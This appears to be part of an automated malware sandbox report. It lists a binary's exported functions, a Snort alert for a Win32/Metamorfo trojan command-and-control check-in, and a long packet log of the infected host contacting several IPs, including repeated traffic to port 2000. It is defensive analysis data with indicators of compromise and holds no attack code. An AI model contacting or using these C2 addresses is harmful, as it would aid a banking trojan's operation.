HTMLayoutSetOption	98	0x7f238c
HTMLayoutSetScrollPos	97	0x7f238c
HTMLayoutSetStyleAttribute	96	0x7f238c
HTMLayoutSetTimer	95	0x7f238c
HTMLayoutSetTimerEx	94	0x7f238c
HTMLayoutSetupDebugOutput	93	0x7f238c
HTMLayoutShowPopup	92	0x7f238c
HTMLayoutShowPopupAt	91	0x7f238c
HTMLayoutSortElements	90	0x7f238c
HTMLayoutSwapElements	89	0x7f238c
HTMLayoutTrackPopupAt	88	0x7f238c
HTMLayoutTranslateMessage	87	0x7f238c
HTMLayoutTraverseUIEvent	86	0x7f238c
HTMLayoutUpdateElement	85	0x7f238c
HTMLayoutUpdateElementEx	84	0x7f238c
HTMLayoutUpdateWindow	83	0x7f238c
HTMLayoutUrlEscape	82	0x7f238c
HTMLayoutUrlUnescape	81	0x7f238c
HTMLayoutVisitElements	80	0x7f238c
HTMLayoutWindowAttachEventHandler	79	0x7f238c
HTMLayoutWindowDetachEventHandler	78	0x7f238c
HTMLayout_UnuseElement	77	0x7f238c
HTMLayout_UseElement	76	0x7f238c
HTMLiteAdvanceFocus	75	0x7f238c
HTMLiteAttachEventHandler	74	0x7f238c
HTMLiteCreateInstance	73	0x7f238c
HTMLiteDestroyInstance	72	0x7f238c
HTMLiteDetachEventHandler	71	0x7f238c
HTMLiteFindElement	70	0x7f238c
HTMLiteGetDocumentMinHeight	69	0x7f238c
HTMLiteGetDocumentMinWidth	68	0x7f238c
HTMLiteGetElementByUID	67	0x7f238c
HTMLiteGetElementHTMLITE	66	0x7f238c
HTMLiteGetFocusElement	65	0x7f238c
HTMLiteGetNextFocusable	64	0x7f238c
HTMLiteGetRootElement	63	0x7f238c
HTMLiteGetTag	62	0x7f238c
HTMLiteLoadHtmlFromFile	61	0x7f238c
HTMLiteLoadHtmlFromMemory	60	0x7f238c
HTMLiteMeasure	59	0x7f238c
HTMLiteRender	58	0x7f238c
HTMLiteRenderEx	57	0x7f238c
HTMLiteRenderOnBitmap	56	0x7f238c
HTMLiteSetCallback	55	0x7f238c
HTMLiteSetDataReady	54	0x7f238c
HTMLiteSetDataReadyAsync	53	0x7f238c
HTMLiteSetMediaType	52	0x7f238c
HTMLiteSetTag	51	0x7f238c
HTMLiteTraverseUIEvent	50	0x7f238c
HTMLiteUpdateView	49	0x7f238c
HTMPrintCreateInstance	48	0x7f238c
HTMPrintDestroyInstance	47	0x7f238c
HTMPrintGetDocumentHeight	46	0x7f238c
HTMPrintGetDocumentMinWidth	45	0x7f238c
HTMPrintGetRootElement	44	0x7f238c
HTMPrintGetTag	43	0x7f238c
HTMPrintLoadHtmlFromFile	42	0x7f238c
HTMPrintLoadHtmlFromFileW	41	0x7f238c
HTMPrintLoadHtmlFromMemory	40	0x7f238c
HTMPrintMeasure	39	0x7f238c
HTMPrintRender	38	0x7f238c
HTMPrintSetCallback	37	0x7f238c
HTMPrintSetDataReady	36	0x7f238c
HTMPrintSetHyperlinkAreaCallback	35	0x7f238c
HTMPrintSetLoadDataCallback	34	0x7f238c
HTMPrintSetMediaType	33	0x7f238c
HTMPrintSetNextPageCallback	32	0x7f238c
HTMPrintSetTag	31	0x7f238c
TMethodImplementationIntercept	3	0x469864
ValueBinaryData	30	0x7f238c
ValueBinaryDataSet	29	0x7f238c
ValueClear	28	0x7f238c
ValueCompare	27	0x7f238c
ValueCopy	26	0x7f238c
ValueElementsCount	25	0x7f238c
ValueEnumElements	24	0x7f238c
ValueFloatData	23	0x7f238c
ValueFloatDataSet	22	0x7f238c
ValueFromString	21	0x7f238c
ValueGetValueOfKey	20	0x7f238c
ValueInit	19	0x7f238c
ValueInt64Data	18	0x7f238c
ValueInt64DataSet	17	0x7f238c
ValueIntData	16	0x7f238c
ValueIntDataSet	15	0x7f238c
ValueInvoke	14	0x7f238c
ValueIsolate	13	0x7f238c
ValueNthElementKey	12	0x7f238c
ValueNthElementValue	11	0x7f238c
ValueNthElementValueSet	10	0x7f238c
ValueSetValueToKey	9	0x7f238c
ValueStringData	8	0x7f238c
ValueStringDataSet	7	0x7f238c
ValueToString	6	0x7f238c
ValueType	5	0x7f238c
_HTMLayoutSetMediaVars@8	4	0x7f238c
__dbk_fcall_wrapper	2	0x411758
dbkFCallWrapperAddr	1	0x81d634

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3141.8.197.4249705802833187 12/04/22-22:24:29.608439	TCP	2833187	ETPRO TROJAN Win32/Metamorfo CnC Checkin	49705	80	192.168.2.3	141.8.197.42

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2022 22:24:29.558840036 CET	49705	80	192.168.2.3	141.8.197.42
Dec 4, 2022 22:24:29.607657909 CET	80	49705	141.8.197.42	192.168.2.3
Dec 4, 2022 22:24:29.607819080 CET	49705	80	192.168.2.3	141.8.197.42
Dec 4, 2022 22:24:29.608438969 CET	49705	80	192.168.2.3	141.8.197.42
Dec 4, 2022 22:24:29.657253981 CET	80	49705	141.8.197.42	192.168.2.3
Dec 4, 2022 22:24:29.657469034 CET	49705	80	192.168.2.3	141.8.197.42
Dec 4, 2022 22:24:29.706732988 CET	80	49705	141.8.197.42	192.168.2.3
Dec 4, 2022 22:24:29.707089901 CET	80	49705	141.8.197.42	192.168.2.3
Dec 4, 2022 22:24:29.707148075 CET	80	49705	141.8.197.42	192.168.2.3
Dec 4, 2022 22:24:29.708671093 CET	49705	80	192.168.2.3	141.8.197.42
Dec 4, 2022 22:24:29.708725929 CET	49705	80	192.168.2.3	141.8.197.42
Dec 4, 2022 22:24:29.761914015 CET	80	49705	141.8.197.42	192.168.2.3
Dec 4, 2022 22:24:30.540967941 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:30.541055918 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:30.541182041 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:30.568197966 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:30.568252087 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:30.632766008 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:30.633042097 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:30.636622906 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:30.636662006 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:30.637084961 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:30.720875025 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:30.978382111 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:30.978446007 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:30.978553057 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:30.984556913 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:30.984612942 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:31.039632082 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:31.039729118 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:31.043879032 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:31.043900967 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:31.044317961 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:31.220869064 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:31.417792082 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:31.417848110 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:31.956968069 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:31.957032919 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:32.247209072 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:32.247493029 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:32.247822046 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:32.268958092 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:32.269030094 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:32.269063950 CET	49706	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:32.269081116 CET	443	49706	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:32.439500093 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:32.439764977 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:32.440769911 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:32.440989971 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:32.441025972 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:32.441056013 CET	49707	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:32.441076040 CET	443	49707	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:32.856518984 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:32.959736109 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:32.959917068 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:33.209419012 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:33.312201023 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:33.317472935 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:34.810281038 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:34.810384989 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:34.810496092 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:34.826961994 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:34.827008963 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:34.872123003 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:34.872205019 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:34.876988888 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:34.877023935 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:34.877511024 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:35.012207031 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:35.961409092 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:36.069016933 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:36.070651054 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:36.214833021 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:36.228599072 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:36.312284946 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:36.320386887 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:36.432481050 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:36.444801092 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:36.588478088 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:36.635149002 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:36.636060953 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:36.779478073 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:36.893256903 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:37.006364107 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:41.683252096 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:41.696155071 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:41.806731939 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:41.812724113 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:42.051532984 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:42.051950932 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:42.195605040 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:42.195658922 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:45.278604984 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:45.278666019 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:45.333712101 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:45.333901882 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:45.333965063 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:45.336783886 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:45.336817980 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:45.336855888 CET	49710	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:24:45.336868048 CET	443	49710	172.67.34.170	192.168.2.3
Dec 4, 2022 22:24:46.707431078 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:46.708223104 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:46.718482971 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:46.719618082 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:46.851156950 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:46.862828970 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:48.184946060 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:48.288027048 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:48.288204908 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:51.291475058 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:51.401165962 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:51.401772022 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:51.546680927 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:51.567138910 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:51.707406998 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:51.728020906 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:51.731492043 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:51.740789890 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:51.750153065 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:51.810188055 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:51.811495066 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:51.875581980 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:51.898761988 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:51.956669092 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:56.801275969 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:56.801832914 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:56.815216064 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:56.817265034 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:56.824177027 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:56.825316906 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:24:56.945722103 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:56.960249901 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:24:56.968904972 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:01.832604885 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:01.833422899 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:01.860811949 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:01.861572981 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:01.869435072 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:01.870161057 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:01.977345943 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:02.004796982 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:02.014235973 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:05.525688887 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:05.525748014 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:05.525820017 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:05.559415102 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:05.559463024 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:05.604449987 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:05.604573965 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:05.612209082 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:05.612246990 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:05.612663984 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:05.715507030 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:06.578428984 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:06.578489065 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:06.794616938 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:06.794708967 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:06.794800043 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:06.847516060 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:06.847752094 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:06.847840071 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:06.852530956 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:06.852570057 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:06.852619886 CET	49720	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:06.852627993 CET	443	49720	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:06.856333017 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:06.856393099 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:06.877563000 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:06.878058910 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:06.890511036 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:06.891221046 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:06.897474051 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:06.897603989 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:06.901983023 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:06.902019024 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:06.902375937 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:06.903706074 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:06.904716015 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:07.015532970 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:07.022181988 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:07.034393072 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:07.051131010 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:07.709666014 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:07.709741116 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:07.709849119 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:07.758471966 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:07.758533955 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:07.775624037 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:07.809559107 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:07.809844017 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:07.818444967 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:07.818483114 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:07.819082975 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:07.878985882 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:07.879534006 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:07.915647030 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:08.027112961 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:08.027168989 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:08.246283054 CET	49724	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:08.246345043 CET	443	49724	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:08.246465921 CET	49724	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:08.287951946 CET	49724	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:08.288021088 CET	443	49724	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:08.301934958 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:08.302189112 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:08.302320004 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:08.305757046 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:08.305813074 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:08.305845976 CET	49721	443	192.168.2.3	104.20.67.143
Dec 4, 2022 22:25:08.305864096 CET	443	49721	104.20.67.143	192.168.2.3
Dec 4, 2022 22:25:08.338073969 CET	443	49724	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:08.338251114 CET	49724	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:08.340842962 CET	49724	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:08.340868950 CET	443	49724	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:08.341628075 CET	443	49724	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:08.415636063 CET	49724	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:09.194351912 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:09.298224926 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:09.298333883 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:09.584754944 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:09.584829092 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:09.584928036 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:09.648732901 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:09.648794889 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:09.700040102 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:09.700221062 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:09.702524900 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:09.702548027 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:09.703265905 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:09.815778017 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:10.538710117 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:10.538800955 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:10.573712111 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:10.573966980 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:10.574126959 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:10.574642897 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:10.574676991 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:10.574717045 CET	49722	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:10.574733019 CET	443	49722	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:10.880961895 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:10.989387035 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:10.995676994 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:11.073144913 CET	49724	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:11.073194027 CET	443	49724	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:11.105148077 CET	443	49724	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:11.105276108 CET	443	49724	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:11.105356932 CET	49724	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:11.105983019 CET	49724	443	192.168.2.3	172.67.34.170
Dec 4, 2022 22:25:11.106020927 CET	443	49724	172.67.34.170	192.168.2.3
Dec 4, 2022 22:25:11.137514114 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:11.208801985 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:11.682279110 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:11.785115004 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:11.785303116 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:11.914990902 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:11.916677952 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:11.926707029 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:11.928381920 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:11.937956095 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:11.940733910 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:11.943595886 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:11.950505018 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:11.953562021 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:12.056483984 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:12.057444096 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:12.061075926 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:12.072779894 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:12.087095022 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:12.093955040 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:12.300035000 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:12.412875891 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:12.413707972 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:25:12.513304949 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:12.513362885 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:12.555859089 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:12.559056044 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:12.602435112 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:25:12.615987062 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:12.616034031 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:12.621104956 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:12.621104956 CET	49726	443	192.168.2.3	104.20.68.143
Dec 4, 2022 22:25:12.621155977 CET	443	49726	104.20.68.143	192.168.2.3
Dec 4, 2022 22:25:12.621493101 CET	443	49726	104.20.68.143	192.168.2.3
